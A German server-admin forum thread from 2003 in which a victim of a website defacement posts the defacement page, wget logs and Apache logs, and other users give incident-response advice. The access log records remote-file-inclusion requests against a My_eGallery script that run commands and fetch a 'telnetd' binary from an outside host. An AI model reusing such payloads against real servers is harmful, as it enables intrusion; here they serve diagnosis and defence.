Brauche dringend Hilfe ! Bin gehackt worden

Lesenswerte Artikel, Anleitungen und Diskussionen
bernard
Posts: 45
Joined: 2002-12-24 18:52

Brauche dringend Hilfe ! Bin gehackt worden

Post by bernard » 2003-12-31 02:35

Hallo !
habe folgende Datei als index.html in meinem Confixx-Verzeichnis gefunden:

Die index.php von Confixx war auch überschrieben.
Die index.html von meinem Kunden web2 auch überschrieben.
Affix Ownz j00!!!
Quem está salvo nos dias de hoje ? Com guerras,tráfico e violência...o mundo gira em torno de um grande interesse econômico...Onde "nós" matamos por dinheiro e comida.....Quando isso irá acabar? Quando nossa raça for destruída por ela mesma, em guerras nucleares? Ou quando todos nos chegarmos ao um consenso de que a vida humana vale muito mais do que um misero dólar ou euro? Isso nós não sabemos..Mas eu sei de uma coisa...que se nós continuarmos assim....Iremos todos para o Inferno!!

uid=0(root) gid=0(root) groups=0(root)

We are: Pra que colocar os nomes dos membros, sendo que todos nós juntos formamos um só ?

Irc.Brasnet.Org #Affix

S0l4r1s@Bsdmail.org

"Não importa o que façamos, sempre seremos mal compreendidos."
Ich verstehe zwar kein Spanisch, aber so viel weiss ich dass die Kacke am dampfen ist. Was soll ich tun ? In den Logfiles ist mir nichts aufgefallen ... laut Confixx (als Admin eingeloggt) ist kein Traffic verbraucht worden. Anscheindend sind "nur" die Dateien ersetzt worden. Kann ich dem überhaupt vertrauen ? Wo kann ich den Traffic zuverlässig abfragen ?

So eine Scheisse, einmal "unvorsichtig" und schon hat man den Salat. Wir haben vor Weihnachten Xampp installiert und während der Feiertage hatte ich den Server nicht in den Augen.

Hat jemand Tips für mich was ich tun soll ? Der Server ist erst mal im Rescue Modus !

Gruss
B.
Last edited by bernard on 2004-03-12 20:08, edited 1 time in total.

bernard
Posts: 45
Joined: 2002-12-24 18:52

Re: Brauche dringend Hilfe ! Bin gehackt worden

Post by bernard » 2003-12-31 02:50

In den Home-Verzeichnissen sind die Index Dateien überschrieben worden. Rechte stehen im Moment auf 755 und die User stimmen eigentlich.

bernard
Posts: 45
Joined: 2002-12-24 18:52

Re: Brauche dringend Hilfe ! Bin gehackt worden

Post by bernard » 2003-12-31 03:14

Doch noch was gefunden /tmp wget_log
--05:33:42-- http://www.vrfhp.hpg.com.br/porta23/local20
=> `local20'
Resolving http://www.vrfhp.hpg.com.br... done.
Connecting to http://www.vrfhp.hpg.com.br[200.226.137.9]:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: http://www.vrfhp.hpg.ig.com.br/porta23/local20 [following]
--05:33:43-- http://www.vrfhp.hpg.ig.com.br/porta23/local20
=> `local20'
Resolving http://www.vrfhp.hpg.ig.com.br... done.
Connecting to http://www.vrfhp.hpg.ig.com.br[200.226.137.10]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4,590,868 [text/plain]

60% [=====================> ] 2,774,440 2.94K/s ETA 10:02
60% [=====================> ] 2,777,088 2.94K/s ETA 10:01
60% [=====================> ] 2,778,536 2.94K/s ETA 10:01
60% [=====================> ] 2,781,184 2.95K/s ETA 10:00
60% [=====================> ] 2,782,632 2.94K/s ETA 10:00
60% [=====================> ] 2,785,280 2.94K/s ETA 09:58
60% [=====================> ] 2,786,728 2.94K/s ETA 09:58
60% [=====================> ] 2,789,376 2.94K/s ETA 09:57
60% [=====================> ] 2,790,824 2.94K/s ETA 09:57
60% [=====================> ] 2,793,472 2.94K/s ETA 09:56
60% [=====================> ] 2,794,920 2.94K/s ETA 09:55
60% [=====================> ] 2,796,368 2.94K/s ETA 09:55
60% [=====================> ] 2,797,568 2.94K/s ETA 09:54
60% [=====================> ] 2,799,016 2.94K/s ETA 09:54
61% [=====================> ] 2,801,664 2.95K/s ETA 09:53
61% [=====================> ] 2,803,112 2.94K/s ETA 09:53
61% [=====================> ] 2,805,760 2.94K/s ETA 09:51
61% [=====================> ] 2,807,208 2.94K/s ETA 09:51
61% [=====================> ] 2,809,856 2.94K/s ETA 09:50
61% [=====================> ] 2,811,304 2.94K/s ETA 09:50
61% [=====================> ] 2,813,952 2.94K/s ETA 09:49
61% [=====================> ] 2,815,400 2.94K/s ETA 09:49
61% [=====================> ] 2,818,048 2.94K/s ETA 09:47
61% [=====================> ] 2,819,496 2.94K/s ETA 09:47
61% [=====================> ] 2,822,144 2.95K/s ETA 09:46
61% [=====================> ] 2,823,592 2.94K/s ETA 09:46
61% [=====================> ] 2,826,240 2.94K/s ETA 09:45
61% [=====================> ] 2,827,688 2.94K/s ETA 09:45
61% [=====================> ] 2,830,336 2.94K/s ETA 09:43
61% [=====================> ] 2,831,784 2.94K/s ETA 09:43
61% [=====================> ] 2,834,432 2.94K/s ETA 09:42
61% [=====================> ] 2,835,880 2.94K/s ETA 09:42
61% [=====================> ] 2,838,528 2.94K/s ETA 09:41
61% [=====================> ] 2,839,976 2.94K/s ETA 09:40
61% [=====================> ] 2,842,624 2.95K/s ETA 09:39
61% [=====================> ] 2,844,072 2.94K/s ETA 09:39
62% [=====================> ] 2,846,720 2.94K/s ETA 09:38
62% [=====================> ] 2,848,168 2.94K/s ETA 09:38
62% [=====================> ] 2,850,816 2.94K/s ETA 09:37
62% [=====================> ] 2,852,264 2.94K/s ETA 09:36
62% [======================> ] 2,854,912 2.94K/s ETA 09:35
62% [======================> ] 2,856,360 2.94K/s ETA 09:35
62% [======================> ] 2,859,008 2.95K/s ETA 09:34
62% [======================> ] 2,860,456 2.94K/s ETA 09:34

usw. usw.


4,524,880 2.94K/s ETA 00:21
98% [===================================> ] 4,526,080 2.94K/s ETA 00:21
98% [===================================> ] 4,527,528 2.94K/s ETA 00:21
98% [===================================> ] 4,530,176 2.94K/s ETA 00:20
98% [===================================> ] 4,531,624 2.94K/s ETA 00:19
98% [===================================> ] 4,534,272 2.94K/s ETA 00:18
98% [===================================> ] 4,535,720 2.94K/s ETA 00:18
98% [===================================> ] 4,538,368 2.94K/s ETA 00:17
98% [===================================> ] 4,539,816 2.94K/s ETA 00:16
98% [===================================> ] 4,542,464 2.94K/s ETA 00:16
98% [===================================> ] 4,543,912 2.94K/s ETA 00:15
99% [===================================> ] 4,546,560 2.94K/s ETA 00:14
99% [===================================> ] 4,548,008 2.94K/s ETA 00:14
99% [===================================> ] 4,549,456 2.94K/s ETA 00:13
99% [===================================> ] 4,550,656 2.94K/s ETA 00:13
99% [===================================> ] 4,553,552 2.94K/s ETA 00:12
99% [===================================> ] 4,554,752 2.94K/s ETA 00:11
99% [===================================> ] 4,556,200 2.94K/s ETA 00:11
99% [===================================> ] 4,558,848 2.94K/s ETA 00:10
99% [===================================> ] 4,560,296 2.94K/s ETA 00:10
99% [===================================> ] 4,562,944 2.94K/s ETA 00:09
99% [===================================> ] 4,564,392 2.94K/s ETA 00:08
99% [===================================> ] 4,565,840 2.94K/s ETA 00:08
99% [===================================> ] 4,567,040 2.94K/s ETA 00:07
99% [===================================> ] 4,568,488 2.94K/s ETA 00:07
99% [===================================> ] 4,571,136 2.94K/s ETA 00:06
99% [===================================> ] 4,572,584 2.94K/s ETA 00:06
99% [===================================> ] 4,575,232 2.94K/s ETA 00:05
99% [===================================> ] 4,576,680 2.94K/s ETA 00:04
99% [===================================> ] 4,579,328 2.94K/s ETA 00:03
99% [===================================> ] 4,580,776 2.94K/s ETA 00:03
99% [===================================> ] 4,583,424 2.94K/s ETA 00:02
99% [===================================> ] 4,584,872 2.94K/s ETA 00:01
99% [===================================> ] 4,587,520 2.94K/s ETA 00:01
99% [===================================> ] 4,588,968 2.94K/s ETA 00:00
100%[====================================>] 4,590,868 2.94K/s ETA 00:00
05:59:08 (2.94 KB/s) - `local20' saved [4590868/4590868]
Die Dateien wurdem am 24.12. ersetzt und das Log stammt auch von diesem Datum ... wo sind die reingekommen ?

User avatar
Joe User
Project Manager
Project Manager
Posts: 11583
Joined: 2003-02-27 01:00
Location: Hamburg

Re: Brauche dringend Hilfe ! Bin gehackt worden

Post by Joe User » 2003-12-31 09:04

Bernard wrote:... wo sind die reingekommen ?
Zitat http://www.apachefriends.org/xampp.html:
Die Philosophie

Die Philosophie hinter XAMPP ist Anfängern und Profis einen einfachen Einstieg in die Welt des Apache zu ermöglichen. XAMPP ist so vorkonfiguriert, dass möglichst alle Features von Apache und Co aktiviert sind. So, wie es z. B. für einen Entwickler am angenehmsten ist.

XAMPP ist dadurch nicht als sicher einzustufen und ist somit nicht sofort für den Produktions-Betrieb geeignet. Mit einigen Handgriffen (siehe FAQs) läßt sich XAMPP aber auch schnell internettauglich sicher machen.

In der Linux-Version gibt es bereits die Möglichkeit die Installation einfach und dialogbasiert sicher zu machen.
PayPal.Me/JoeUserFreeBSD Remote Installation
Wings for LifeWings for Life World Run

„If there’s more than one possible outcome of a job or task, and one
of those outcomes will result in disaster or an undesirable consequence,
then somebody will do it that way.“ -- Edward Aloysius Murphy Jr.

higgins
Posts: 25
Joined: 2002-05-31 22:29

Re: Brauche dringend Hilfe ! Bin gehackt worden

Post by higgins » 2003-12-31 10:14

Such ersteinmal ob Du ein Rootkit auf der BOX haat (chkrootkit) allerdings auch wenn es Dir meldet, daß es keine Rootkits gefunden hat kannst Du nicht 100% sicher sein. Das tripwire auf dem Server lief vermute ich mal nicht, denn sonst könntest Du sehen welche Dateien ausgetauscht bzw. verändert wurden.

Sicherste und empfohlene (zumindest von mir) Methode:

Backup der Webdaten machen und BOX neu aufsetzen lassen, danach sämtliche Sicherheitsupdates einspielen. Tripwire, Logwatch installieren, evtl. nen "Honeypot" Compiler vom server schmeissen oder zumindest chmod 000 setzen.

Einfach so jetzt nur die gehackten index.htm* Dateien ersetzen, darauf würde ich nicht vertrauen, denn zumeist hinterlassen die Leute ein Rootkit oder Backdoor/Trojaner, Sniffer wie auch immer und diese alle aufzuspüren ist fast unmöglich.

Hier hat es mal einer versucht: http://www.yolinux.com/TUTORIALS/LinuxT ... oject.html

ist dann aber auch zu dem Schluss gekommen: BOX neu aufsetzen ist das einzige was hilft. Auch wenn es bei Dir evtl. keine "w00t" Atacke war.

Was liegen denn für Dateien im /tmp Verzeichniss ?

bernard
Posts: 45
Joined: 2002-12-24 18:52

Re: Brauche dringend Hilfe ! Bin gehackt worden

Post by bernard » 2003-12-31 12:00

Da liegt diese heruntergeladene "local20" Datei ca. 4 MB grosses Binary.
Such ersteinmal ob Du ein Rootkit auf der BOX haat (chkrootkit) allerdings auch wenn es Dir meldet, daß es keine Rootkits gefunden hat kannst Du nicht 100% sicher sein. Das tripwire auf dem Server lief vermute ich mal nicht, denn sonst könntest Du sehen welche Dateien ausgetauscht bzw. verändert wurden.
Wie suchen ? Wer meldet mir das ?
w00t" Atacke
Was genau versteht man darunter ?

toolfish
Posts: 10
Joined: 2003-01-03 02:07
Location: Nahe einem Rechenzentrum

Re: Brauche dringend Hilfe ! Bin gehackt worden

Post by toolfish » 2003-12-31 12:02

Schau dir mal den Link an, den dir Higgins gegeben hat: http://www.yolinux.com/TUTORIALS/LinuxT ... oject.html

;)

bernard
Posts: 45
Joined: 2002-12-24 18:52

Re: Brauche dringend Hilfe ! Bin gehackt worden

Post by bernard » 2003-12-31 12:53

Bin noch ganz durch den Wind, sorry das mit dem Link mache ich gleich...

Zu den Versionen:
XAMPP Linux 1.4 22 MB Apache 2.0.48, MySQL 4.0.16, PHP 4.3.3 & PEAR + SQLite 2.8.6 + multibyte (mbstring) support, Perl 5.8.0, ProFTPD 1.2.9, phpMyAdmin 2.5.4, OpenSSL 0.9.7c, GD 2.0.1, Freetype2 2.1.0, libjpeg 6b, libpng 1.2.2, gdbm 1.8.0, zlib 1.1.4, expat 1.2, Sablotron 1.0, libxml 2.4.26, Ming 0.2a, Webalizer 2.01, pdf class 009e, ncurses 5.8, mod_perl 1.99_08, FreeTDS 0.60, gettext 0.11.5, IMAP C-Client 2002b, OpenLDAP (client) 2.1.22, mcrypt 2.5.7, mhash 0.8.18, Turck MMCache 2.4.4, cURL 7.10.7
MD5 checksum: 42dcdccb64229b726a0700e6a0fd566e
Wir haben wohl richtig scheisse gebaut ... Xampp installiert und fast nichts mehr nachgearbeitet. Das war echt nötiges Lehrgeld. Bequemlichkeit ist absolut fehl am Platz.

Logfiles:

error_log

[Wed Dec 24 00:08:45 2003] [error] [client 217.88.250.160] File does not exist: /home/www/web2/html/themes, referer: http://www.hrvati.de/partner.html
[Wed Dec 24 00:50:51 2003] [error] [client 216.39.50.157] File does not exist: /home/www/web2/html/robots.txt
[Wed Dec 24 01:44:37 2003] [error] [client 195.93.64.16] File does not exist: /home/www/web5/html/style, referer: http://web5.pxxxx.pureserver.info/
[Wed Dec 24 01:44:39 2003] [error] [client 195.93.65.16] File does not exist: /home/www/web5/html/themes/RoundTable/images/themes, referer: http://web5.pxxxxx.pureserver.info/
[Wed Dec 24 03:22:27 2003] [error] [client 200.158.98.178] File does not exist: /home/www/web5/html/style, referer: http://web5.pxxxxx.pureserver.info/inde ... y_eGallery
--03:22:57-- http://www.fdlsk8.hpg.ig.com.br/telnetd
=> `telnetd'
Resolving http://www.fdlsk8.hpg.ig.com.br... done.
Connecting to http://www.fdlsk8.hpg.ig.com.br[200.226.137.10]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 170,613 [text/plain]
0K .......... .......... .......... .......... .......... 30% 57.14 KB/s
50K .......... .......... .......... .......... .......... 60% 227.27 KB/s
100K .......... .......... .......... .......... .......... 90% 219.30 KB/s
150K .......... ...... 100% 874.43 KB/s
03:23:09 (124.15 KB/s) - `telnetd' saved [170613/170613]
--03:23:09-- http://www.fdlsk8.hpg.ig.com.br/telnetd
=> `telnetd.1'
Resolving http://www.fdlsk8.hpg.ig.com.br... done.
Connecting to http://www.fdlsk8.hpg.ig.com.br[200.226.137.11]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 170,613 [text/plain]
0K .......... .......... .......... .......... .......... 30% 57.08 KB/s
50K .......... .......... .......... .......... .......... 60% 228.31 KB/s
100K .......... .......... .......... .......... .......... 90% 228.31 KB/s
150K .......... ...... 100% 75.18 KB/s
03:23:11 (108.54 KB/s) - `telnetd.1' saved [170613/170613]
--03:23:12-- http://www.fdlsk8.hpg.ig.com.br/telnetd
=> `telnetd.2'
Resolving http://www.fdlsk8.hpg.ig.com.br... done.
Connecting to http://www.fdlsk8.hpg.ig.com.br[200.226.137.12]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 170,613 [text/plain]
0K .......... .......... .......... .......... .......... 30% 57.01 KB/s
50K .......... .......... .......... .......... .......... 60% 226.24 KB/s
100K .......... .......... .......... .......... .......... 90% 220.26 KB/s
150K .......... ...... 100% 923.01 KB/s
03:23:13 (124.06 KB/s) - `telnetd.2' saved [170613/170613]
access_log
24/Dec/2003:00:05:28 +0100] "GET / HTTP/1.1" 200 230
213.23.45.141 - - [24/Dec/2003:00:08:42 +0100] "GET / HTTP/1.1" 200 230
217.88.250.160 - - [24/Dec/2003:00:08:45 +0100] "GET /themes/CRO_Stuttg/images/logo.gif HTTP/1.1" 404 393
82.193.208.140 - - [24/Dec/2003:00:22:10 +0100] "GET / HTTP/1.1" 200 230
66.196.90.250 - - [24/Dec/2003:00:33:02 +0100] "GET /robots.txt HTTP/1.0" 200 220
66.196.90.33 - - [24/Dec/2003:00:33:02 +0100] "GET /index.php?module=My_eGallery&POSTNUKESID=98cd45f6bbe5fa510dd8644f8d53f055 HTTP/1.0" 200 3447
216.39.50.157 - - [24/Dec/2003:00:50:51 +0100] "GET /robots.txt HTTP/1.0" 404 370
216.39.50.157 - - [24/Dec/2003:00:50:52 +0100] "GET / HTTP/1.0" 200 230
212.33.50.113 - - [24/Dec/2003:00:54:57 +0100] "GET / HTTP/1.1" 304 -
66.196.90.92 - - [24/Dec/2003:00:56:34 +0100] "GET /index.php?POSTNUKESID=7e37bd6e2beb0893f848ba626e292dcc HTTP/1.0" 200 8885
80.138.58.46 - - [24/Dec/2003:01:28:18 +0100] "GET / HTTP/1.1" 200 230
195.93.65.5 - - [24/Dec/2003:01:44:33 +0100] "GET / HTTP/1.0" 200 8901
195.93.65.16 - - [24/Dec/2003:01:44:34 +0100] "GET /themes/RoundTable/style/styleNN.css HTTP/1.0" 200 -
195.93.74.6 - - [24/Dec/2003:01:44:35 +0100] "GET /javascript/showimages.php HTTP/1.0" 200 219
195.93.65.9 - - [24/Dec/2003:01:44:35 +0100] "GET /themes/RoundTable/style/style.css HTTP/1.0" 200 13953
195.93.73.9 - - [24/Dec/2003:01:44:36 +0100] "GET /javascript/quickbuild.js HTTP/1.0" 200 36524
195.93.66.15 - - [24/Dec/2003:01:44:36 +0100] "GET /javascript/tabedit.js HTTP/1.0" 200 10537
195.93.64.10 - - [24/Dec/2003:01:44:36 +0100] "GET /javascript/returnnl.js HTTP/1.0" 200 641
195.93.66.17 - - [24/Dec/2003:01:44:36 +0100] "GET /javascript/recover.js HTTP/1.0" 200 3419
195.93.66.4 - - [24/Dec/2003:01:44:37 +0100] "GET /javascript/openwindow.php?hlpfile= HTTP/1.0" 200 166
195.93.64.16 - - [24/Dec/2003:01:44:37 +0100] "GET /style/style.css HTTP/1.0" 404 384
195.93.66.5 - - [24/Dec/2003:01:44:37 +0100] "GET /content/Banner/banner_nsp_small.gif HTTP/1.0" 200 2282
195.93.72.8 - - [24/Dec/2003:01:44:37 +0100] "GET /themes/RoundTable/images/logo_links.gif HTTP/1.0" 200 17371
195.93.65.10 - - [24/Dec/2003:01:44:37 +0100] "GET /themes/RoundTable/images/blank.gif HTTP/1.0" 200 42
195.93.65.13 - - [24/Dec/2003:01:44:37 +0100] "GET /banner/rtdmail.gif HTTP/1.0" 200 4183
195.93.66.9 - - [24/Dec/2003:01:44:38 +0100] "GET /banner/rtonline.gif HTTP/1.0" 200 4652
195.93.73.16 - - [24/Dec/2003:01:44:38 +0100] "GET /banner/banner_latinum.gif HTTP/1.0" 200 9705
195.93.65.16 - - [24/Dec/2003:01:44:39 +0100] "GET /themes/RoundTable/images/themes/bndbx_tile_left.gif HTTP/1.1" 404 420
195.93.66.18 - - [24/Dec/2003:01:44:39 +0100] "GET /themes/RoundTable/images/bndbx_corner_t-l.gif HTTP/1.0" 200 844
195.93.74.10 - - [24/Dec/2003:01:44:39 +0100] "GET /themes/RoundTable/images/bndbx_tile_top.gif HTTP/1.0" 200 50
195.93.66.16 - - [24/Dec/2003:01:44:39 +0100] "GET /themes/RoundTable/images/bndbx_corner_t-r.gif HTTP/1.0" 200 843
195.93.73.17 - - [24/Dec/2003:01:44:39 +0100] "GET /content/Banner/nsp_ani.gif HTTP/1.0" 200 28164
195.93.72.8 - - [24/Dec/2003:01:44:40 +0100] "GET /images/global/print.gif HTTP/1.1" 200 231
195.93.72.16 - - [24/Dec/2003:01:44:40 +0100] "GET /images/global/friend.gif HTTP/1.0" 200 240
195.93.64.4 - - [24/Dec/2003:01:44:40 +0100] "GET /themes/RoundTable/images/bndbx_tile_right.gif HTTP/1.0" 200 53
195.93.74.20 - - [24/Dec/2003:01:44:40 +0100] "GET /themes/RoundTable/images/bndbx_corner_b-l.gif HTTP/1.0" 200 844
195.93.64.9 - - [24/Dec/2003:01:44:40 +0100] "GET /themes/RoundTable/images/bndbx_tile_bottom.gif HTTP/1.0" 200 50
195.93.74.20 - - [24/Dec/2003:01:44:41 +0100] "GET /themes/RoundTable/images/bndbx_corner_b-r.gif HTTP/1.0" 200 844
195.93.74.22 - - [24/Dec/2003:01:44:41 +0100] "GET /content/images/rtwebsite.gif HTTP/1.0" 200 11741
195.93.72.17 - - [24/Dec/2003:01:44:41 +0100] "GET /content/images/blank.gif HTTP/1.0" 200 58
195.93.73.8 - - [24/Dec/2003:01:44:41 +0100] "GET /content/images/visa150.gif HTTP/1.0" 200 16166
195.93.72.7 - - [24/Dec/2003:01:44:41 +0100] "GET /modules/XForum/images/smilies/smile.gif HTTP/1.0" 200 174
195.93.66.8 - - [24/Dec/2003:01:44:41 +0100] "GET /images/iBlock/Members_Online/info.gif HTTP/1.0" 200 6430
195.93.73.10 - - [24/Dec/2003:01:44:41 +0100] "GET /modules/XForum/images/smilies/thumbup.gif HTTP/1.0" 200 249
195.93.74.7 - - [24/Dec/2003:01:44:42 +0100] "GET /modules/My_eGallery/gallery/3K03_wanderung/thumb/106-0659_IMG.jpg HTTP/1.0" 200 6500
195.93.72.8 - - [24/Dec/2003:01:44:42 +0100] "GET /themes/RoundTable/images/logo_mitte.gif HTTP/1.1" 200 824
195.93.66.5 - - [24/Dec/2003:01:44:42 +0100] "GET /themes/RoundTable/images/logo_rechts.gif HTTP/1.1" 200 5839
195.93.65.4 - - [24/Dec/2003:01:44:42 +0100] "GET /themes/RoundTable/images/fueller_oben.gif HTTP/1.0" 200 799
195.93.73.10 - - [24/Dec/2003:01:44:42 +0100] "GET /themes/RoundTable/images/leftboxtitle.gif HTTP/1.1" 200 844
195.93.74.18 - - [24/Dec/2003:01:44:42 +0100] "GET /themes/RoundTable/images/bndbx_tile_left.gif HTTP/1.0" 200 53
195.93.74.18 - - [24/Dec/2003:01:44:42 +0100] "GET /modules/PostCalendar/pnincludes/overlib_mini.js HTTP/1.1" 200 27122
195.93.72.9 - - [24/Dec/2003:01:44:43 +0100] "GET /themes/RoundTable/images/fuss_links.gif HTTP/1.0" 200 6982
195.93.72.9 - - [24/Dec/2003:01:44:43 +0100] "GET /themes/RoundTable/images/fuss_mitte.gif HTTP/1.0" 200 817
195.93.65.8 - - [24/Dec/2003:01:44:43 +0100] "GET /themes/RoundTable/images/fuss_rechts.gif HTTP/1.0" 200 3236
66.196.65.35 - - [24/Dec/2003:02:25:11 +0100] "GET /robots.txt HTTP/1.0" 200 220
66.196.72.79 - - [24/Dec/2003:02:26:54 +0100] "GET /modules.php?op=modload&name=Members_List&file=index&letter=D&sortby=uname HTTP/1.0" 200 33958
66.196.72.75 - - [24/Dec/2003:02:44:57 +0100] "GET /modules.php?op=modload&name=News&file=index&catid=&topic=4 HTTP/1.0" 200 57629
200.158.98.178 - - [24/Dec/2003:03:22:21 +0100] "GET /index.php?module=My_eGallery HTTP/1.1" 200 3449
200.158.98.178 - - [24/Dec/2003:03:22:30 +0100] "GET /banner/rtonline.gif HTTP/1.1" 200 4652
200.158.98.178 - - [24/Dec/2003:03:22:31 +0100] "GET /content/Banner/banner_nsp_small.gif HTTP/1.1" 200 2282
200.158.98.178 - - [24/Dec/2003:03:22:31 +0100] "GET /banner/rtdmail.gif HTTP/1.1" 200 4183
200.158.98.178 - - [24/Dec/2003:03:22:32 +0100] "GET /content/Banner/banner_nsp.gif HTTP/1.1" 200 23291
200.158.98.178 - - [24/Dec/2003:03:22:32 +0100] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.jesusaleluia.iwebland.com/dc ... me%20-a;id HTTP/1.1" 200 3636
200.158.98.178 - - [24/Dec/2003:03:22:42 +0100] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.jesusaleluia.iwebland.com/dcphp3.gif?&cmd=id HTTP/1.1" 200 3282
200.158.98.178 - - [24/Dec/2003:03:22:57 +0100] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.jesusaleluia.iwebland.com/dc ... ;./telnetd HTTP/1.1" 200 3063
200.171.41.250 - - [24/Dec/2003:03:44:28 +0100] "GET / HTTP/1.1" 200 863
200.171.41.250 - - [24/Dec/2003:03:44:29 +0100] "GET /style.css HTTP/1.1" 404 373
66.196.90.123 - - [24/Dec/2003:03:44:33 +0100] "GET /kontakt.php?POSTNUKESID=c41a175997fd3ef57b5dff20f0222d31 HTTP/1.0" 200 6567
200.171.41.250 - - [24/Dec/2003:03:44:42 +0100] "GET /logogross.gif HTTP/1.1" 200 8333
200.171.41.250 - - [24/Dec/2003:03:52:45 +0100] "GET / HTTP/1.1" 200 8869
200.171.41.250 - - [24/Dec/2003:03:52:46 +0100] "GET /javascript/showimages.php HTTP/1.1" 200 219
200.171.41.250 - - [24/Dec/2003:03:52:47 +0100] "GET /themes/RoundTable/style/styleNN.css HTTP/1.1" 200 -
200.171.41.250 - - [24/Dec/2003:03:52:47 +0100] "GET /themes/RoundTable/style/style.css HTTP/1.1" 200 13953
200.171.41.250 - - [24/Dec/2003:03:52:48 +0100] "GET /javascript/quickbuild.js HTTP/1.1" 200 36524
200.171.41.250 - - [24/Dec/2003:03:52:50 +0100] "GET /javascript/tabedit.js HTTP/1.1" 200 10537
200.158.98.178 - - [24/Dec/2003:03:59:14 +0100] "GET /index.php?module=My_eGallery HTTP/1.1" 200 3370
200.171.41.250 - - [24/Dec/2003:04:00:00 +0100] "GET / HTTP/1.1" 200 875
200.171.41.250 - - [24/Dec/2003:04:00:01 +0100] "GET /style.css HTTP/1.1" 404 385
200.171.41.250 - - [24/Dec/2003:04:00:02 +0100] "GET /logogross.gif HTTP/1.1" 200 8333
80.138.137.50 - - [24/Dec/2003:04:00:52 +0100] "GET / HTTP/1.1" 200 6
200.171.41.250 - - [24/Dec/2003:04:04:50 +0100] "GET / HTTP/1.1" 200 863
200.171.41.250 - - [24/Dec/2003:04:04:50 +0100] "GET /style.css HTTP/1.1" 404 373
66.196.65.35 - - [24/Dec/2003:04:47:12 +0100] "GET /robots.txt HTTP/1.0" 200 220
66.196.72.94 - - [24/Dec/2003:04:49:07 +0100] "GET /admin.php HTTP/1.0" 302 15832
64.223.153.54 - - [24/Dec/2003:04:49:19 +0100] "GET http://www.yahoo.com/ HTTP/1.1" 200 851
200.171.41.250 - - [24/Dec/2003:04:50:22 +0100] "GET / HTTP/1.1" 200 863
200.171.41.250 - - [24/Dec/2003:04:50:22 +0100] "GET /style.css HTTP/1.1" 404 373
200.171.41.250 - - [24/Dec/2003:04:51:11 +0100] "GET / HTTP/1.1" 200 863
200.171.41.250 - - [24/Dec/2003:04:51:11 +0100] "GET /style.css HTTP/1.1" 404 373
200.171.41.250 - - [24/Dec/2003:04:51:22 +0100] "GET / HTTP/1.1" 200 863
200.171.41.250 - - [24/Dec/2003:04:51:22 +0100] "GET /style.css HTTP/1.1" 404 373
64.68.82.7 - - [24/Dec/2003:04:51:36 +0100] "GET /robots.txt HTTP/1.0" 404 1291
64.68.82.7 - - [24/Dec/2003:04:51:37 +0100] "GET / HTTP/1.0" 200 488
64.68.82.7 - - [24/Dec/2003:04:51:37 +0100] "GET /flash/flashdetection.html HTTP/1.0" 304 -
200.171.41.250 - - [24/Dec/2003:04:51:42 +0100] "GET /index.html HTTP/1.1" 404 374
200.171.41.250 - - [24/Dec/2003:04:51:44 +0100] "GET /index.html HTTP/1.1" 404 374
200.171.41.250 - - [24/Dec/2003:04:51:45 +0100] "GET /index.html HTTP/1.1" 404 374
200.171.41.250 - - [24/Dec/2003:04:51:56 +0100] "GET /style.css HTTP/1.1" 404 373
200.171.41.250 - - [24/Dec/2003:04:52:31 +0100] "GET / HTTP/1.1" 200 863
200.171.41.250 - - [24/Dec/2003:04:52:32 +0100] "GET /style.css HTTP/1.1" 404 373
200.171.41.250 - - [24/Dec/2003:04:52:43 +0100] "GET / HTTP/1.1" 200 863
200.171.41.250 - - [24/Dec/2003:04:52:43 +0100] "GET /style.css HTTP/1.1" 404 373
66.196.72.94 - - [24/Dec/2003:04:53:12 +0100] "GET /index.php HTTP/1.0" 200 71737
66.196.90.250 - - [24/Dec/2003:04:54:25 +0100] "GET /robots.txt HTTP/1.0" 200 220
66.196.90.25 - - [24/Dec/2003:04:54:31 +0100] "GET /user.php?POSTNUKESID=c3d383aa1e5500a378460a932ff55f01 HTTP/1.0" 200 3003
66.196.90.246 - - [24/Dec/2003:05:38:39 +0100] "GET /robots.txt HTTP/1.0" 404 1291
66.196.90.203 - - [24/Dec/2003:05:38:39 +0100] "GET /index.php?page=schulung HTTP/1.0" 200 3542
66.196.65.35 - - [24/Dec/2003:06:01:28 +0100] "GET /robots.txt HTTP/1.0" 200 220
66.196.72.68 - - [24/Dec/2003:06:07:22 +0100] "GET /modules.php?op=modload&name=XForum&file=search&searchname=steffen&searchsubmit=a&srchfid=all HTTP/1.0" 200 24750
66.196.72.68 - - [24/Dec/2003:06:07:38 +0100] "GET /modules.php?op=modload&name=XForum&file=messotd HTTP/1.0" 200 22708
63.148.99.247 - - [24/Dec/2003:06:31:40 +0100] "GET / HTTP/1.0" 302 365
82.82.68.145 - - [24/Dec/2003:06:55:18 +0100] "GET / HTTP/1.1" 200 6
66.196.65.35 - - [24/Dec/2003:07:25:05 +0100] "GET /robots.txt HTTP/1.0" 200 220
66.196.72.65 - - [24/Dec/2003:07:25:26 +0100] "GET /modules.php?op=modload&name=XForum&file=search HTTP/1.0" 200 24327
66.196.72.108 - - [24/Dec/2003:07:28:03 +0100] "GET /modules.php?op=modload&name=News&file=article&sid=37&mode=thread&order=0&thold=0 HTTP/1.0" 200 28733
81.10.172.149 - - [24/Dec/2003:07:31:06 +0100] "GET /themes/CRO_Stuttg/images/logo.gif HTTP/1.1" 404 393
80.138.22.100 - - [24/Dec/2003:08:06:08 +0100] "GET / HTTP/1.1" 200 6
80.138.22.100 - - [24/Dec/2003:08:06:19 +0100] "GET / HTTP/1.1" 200 6
80.138.22.100 - - [24/Dec/2003:08:06:32 +0100] "GET / HTTP/1.1" 200 6
80.138.22.100 - - [24/Dec/2003:08:07:06 +0100] "GET / HTTP/1.1" 200 6
80.138.9.225 - - [24/Dec/2003:08:09:10 +0100] "GET / HTTP/1.1" 200 6
80.138.9.225 - - [24/Dec/2003:08:09:26 +0100] "GET / HTTP/1.1" 200 6
80.138.12.198 - - [24/Dec/2003:08:13:07 +0100] "GET / HTTP/1.1" 200 6
66.196.90.250 - - [24/Dec/2003:09:24:07 +0100] "GET /robots.txt HTTP/1.0" 200 220
66.196.90.188 - - [24/Dec/2003:09:24:08 +0100] "GET / HTTP/1.0" 200 8900
